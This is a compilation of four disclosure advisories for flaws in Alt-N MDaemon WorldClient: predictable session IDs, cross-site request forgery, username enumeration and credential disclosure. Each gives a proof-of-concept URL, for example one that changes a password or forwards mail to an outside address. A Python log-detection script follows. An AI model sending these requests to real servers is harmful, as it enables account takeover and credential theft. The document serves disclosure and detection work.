======================================================================
Alt-N MDaemon's WorldClient Predictable Session ID Vulnerability
======================================================================

Software: Alt-N MDaemon v13.0.3 and prior versions
Vendor: http://www.altn.com/
Vuln Type: Session ID Prediction
Remote: Yes
Local: No
Discovered by: QSecure and Demetris Papapetrou
References: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WorldClient_Predictable_Session_ID.html
Discovered: 25/07/2012
Reported: 19/12/2012
Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html)
Disclosed: 18/02/2013

VULNERABILITY DESCRIPTION:
==========================

Alt-N WorldClient is the web interface of the MDaemon email server. It has been identified that application session state is not maintained by the user's session cookie but by the URL "Session" parameter instead. This parameter is transmitted with every user request sent to the WorldClient web application, and under certain circumstances future session IDs can be successfully predicted.

The use of predictable session IDs for authentication makes WorldClient prone to session hijacking attacks. If an attacker can generate a currently valid session ID, he/she may be able to access webmail accounts without possessing a valid username/password. The impact of the attack is significantly reduced because WorldClient associates the client's IP address with each session ID produced. However, certain network setups or other scenarios may exist that render the IP restriction ineffective.

Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable; other versions may also be affected.

Pre-Requisites:
---------------

1) The attacker needs to get a current or expired session ID.
   a) Google Search: "WorldClient.dll?Session="
   b) Steal an HTTP request and observe the Referer field
2) The MDaemon service or the machine has not been restarted since the captured session ID was generated (there may be a way to deal with this, but further research is needed).

=====================================================================================
Alt-N MDaemon's WorldClient & WebAdmin Cross-Site Request Forgery Vulnerability
=====================================================================================

Software: Alt-N MDaemon v13.0.3 and prior versions
Vendor: http://www.altn.com/
Vuln Type: Cross-Site Request Forgery
Remote: Yes
Local: No
Discovered by: QSecure and Demetris Papapetrou
References: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WorldClient_and_WebAdmin_CSRF.html
Discovered: 25/07/2012
Reported: 19/12/2012
Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html)
Disclosed: 18/02/2013

VULNERABILITY DESCRIPTION:
==========================

The Alt-N WorldClient and WebAdmin applications are prone to a cross-site request forgery vulnerability. It should be noted that partial protection is provided by the Session parameter, but this alone cannot be considered an adequate protection mechanism.

An attacker can exploit this issue to perform various actions on the affected application without the user's consent. For example, the attacker can change the user's password, forward a copy of the user's emails to a different email account, retrieve his/her address book, send email messages to other users/email addresses and/or perform other similar tasks.

Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable; other versions may also be affected.
PoC Exploit:
============

Change Password:
http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n

Enable Forwarding:
http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=evil%40example.com

====================================================================
Alt-N MDaemon's WorldClient Username Enumeration Vulnerability
====================================================================

Software: Alt-N MDaemon v13.0.3 and prior versions
Vendor: http://www.altn.com/
Vuln Type: Username Enumeration
Remote: Yes
Local: No
Discovered by: QSecure and Demetris Papapetrou
References: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WorldClient_Username_Enumeration.html
Discovered: 14/09/2012
Reported: 19/12/2012
Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html)
Disclosed: 18/02/2013

VULNERABILITY DESCRIPTION:
==========================

Alt-N WorldClient is prone to a username-enumeration weakness through queries of a user's Free-Busy schedule. The DTSTART and DTEND parameters in the returned FBData.vfb file may indicate whether an email address/username is valid or not.

Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.

Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable; other versions may also be affected.

PoC Exploit:
============

http://www.example.com:3000/WorldClient.dll?View=fbinfo&User=mickey.mouse@qsecure.com.cy

For valid email accounts the DTSTART and DTEND values in the .vfb file start from a recent date backwards (e.g. 20120505), whereas for invalid ones the date is 19801231.
==========================================================================================
Alt-N MDaemon's WorldClient Disclosure of Authentication Credentials Vulnerability
==========================================================================================

Software: Alt-N MDaemon v13.0.3 and prior versions
Vendor: http://www.altn.com/
Vuln Type: Disclosure of Authentication Credentials
Remote: Yes
Local: No
Discovered by: QSecure and Demetris Papapetrou
References: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WorldClient_Disclosure_of_Authentication_Credentials.html
Discovered: 01/10/2012
Reported: 19/12/2012
Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html)
Disclosed: 18/02/2013

VULNERABILITY DESCRIPTION:
==========================

The Alt-N WorldClient application is prone to disclosure of authentication credentials via a specially formulated HTTP request. This is possible because the application replies to the request with a response that contains the credentials in an encoded (reversible) format.

Attackers may trick an unsuspecting user into opening a malicious email message -using the WorldClient application- and steal his/her authentication credentials without the user ever noticing.

Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable; other versions may also be affected.

PoC Exploit:
============

Vulnerable URL:
http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=WebAdmin

Encoded Auth String:
GaDAQBQOP3cymUmJxiNVaz80JTAklc/c+q7fAhmklkQSdp0XMo2X/4aVhqMtLz4OLuCf6v2T0Gc9KKHkvn ok0B9ARyso9/k

Decoded Auth String:
User=test%40ac1dc0de.com&Password=111111Ab&TimeStamp=1344532850&Lang=en
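The three PoC URLs above (the Options-Prefs save carrying Password/Forwarding fields, the fbinfo Free-Busy lookup, and the WebAdmin view reached with a Session parameter) each leave a distinctive request in the web server log, which gives a defender something to alert on while the fix is rolled out. The following script is an added detection example written for this advisory; it is not part of the original advisory or of the MDaemon product. It assumes a combined-log-style access log (MDaemon's actual log format is not shown on the page), a locally served hostname of mail.example.com, and constructed sample log lines; the IP addresses, session value and user names in the sample are made up.

```python
"""Flag WorldClient request patterns from this advisory in web server access logs.

Assumptions (not from the advisory): logs are in a combined-log-like format,
WorldClient is served from mail.example.com, and the sample lines below are
constructed for illustration.
"""
import re
from collections import defaultdict, namedtuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (combined-log-like format, one request per line).
SAMPLE_LOG = """\
198.51.100.7 - - [18/Feb/2013:10:00:01 +0000] "GET /WorldClient.dll?Session=AAAA1111&View=Main HTTP/1.1" 200 5120 "http://mail.example.com:3000/WorldClient.dll?Session=AAAA1111&View=Login" "Mozilla/5.0"
198.51.100.7 - - [18/Feb/2013:10:00:09 +0000] "GET /WorldClient.dll?Session=AAAA1111&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n HTTP/1.1" 200 88 "http://attacker.example.net/page.html" "Mozilla/5.0"
203.0.113.9 - - [18/Feb/2013:10:01:00 +0000] "GET /WorldClient.dll?View=fbinfo&User=alice@example.com HTTP/1.1" 200 301 "-" "curl/7.29"
203.0.113.9 - - [18/Feb/2013:10:01:01 +0000] "GET /WorldClient.dll?View=fbinfo&User=bob@example.com HTTP/1.1" 200 301 "-" "curl/7.29"
203.0.113.9 - - [18/Feb/2013:10:01:02 +0000] "GET /WorldClient.dll?View=fbinfo&User=carol@example.com HTTP/1.1" 200 301 "-" "curl/7.29"
198.51.100.7 - - [18/Feb/2013:10:02:00 +0000] "GET /WorldClient.dll?Session=AAAA1111&View=WebAdmin HTTP/1.1" 200 640 "http://mail.example.com:3000/WorldClient.dll?Session=AAAA1111&View=Main" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Query parameters in an Options-Prefs save that change credentials or mail routing
# (taken from the two CSRF PoC URLs in the advisory; compared case-insensitively).
SENSITIVE_PREF_PARAMS = {"password", "confirmpassword", "forwardingenabled", "forwardingaddress"}

Finding = namedtuple("Finding", "rule ip detail")


def parse_line(line):
    """Return a dict with ip, path, lower-cased query params and referer, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
    return {"ip": m.group("ip"), "path": parts.path, "query": query,
            "referer": m.group("referer")}


def referer_host(referer):
    """Hostname of the Referer header, or None when it is missing ("-")."""
    return urlsplit(referer).hostname if referer and referer != "-" else None


def detect(lines, local_hosts=("mail.example.com",), fbinfo_threshold=3):
    """Apply the three rules to an iterable of log lines and return Findings."""
    findings = []
    fbinfo_users = defaultdict(set)  # source IP -> distinct User values looked up
    for line in lines:
        ev = parse_line(line)
        if ev is None or not ev["path"].lower().endswith("/worldclient.dll"):
            continue
        q = ev["query"]
        view = q.get("view", "").lower()
        ref_host = referer_host(ev["referer"])

        # Rule 1: a preference save carrying password/forwarding fields whose
        # Referer is missing or from a host other than WorldClient itself.
        hit = SENSITIVE_PREF_PARAMS & q.keys()
        if view == "options-prefs" and q.get("save", "").lower() == "yes" and hit \
                and ref_host not in local_hosts:
            findings.append(Finding("csrf_pref_change", ev["ip"],
                                    {"params": sorted(hit), "referer_host": ref_host}))

        # Rule 2: collect Free-Busy lookups per source for fan-out analysis.
        if view == "fbinfo" and "user" in q:
            fbinfo_users[ev["ip"]].add(q["user"].lower())

        # Rule 3: the WebAdmin view requested through a WorldClient session.
        if view == "webadmin" and "session" in q:
            findings.append(Finding("webadmin_cred_disclosure", ev["ip"],
                                    {"referer_host": ref_host}))

    # Rule 2, second pass: one source asking about many distinct users.
    for ip, users in fbinfo_users.items():
        if len(users) >= fbinfo_threshold:
            findings.append(Finding("fbinfo_enumeration", ip, {"users": sorted(users)}))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG.splitlines()):
        print(finding)
```

Rule 1 treats a missing Referer the same as a foreign one because the legitimate preferences form is served by WorldClient itself; tune local_hosts to every hostname the server answers on or it will fire on normal saves. The fbinfo threshold is a starting point for the sample data, not a calibrated value.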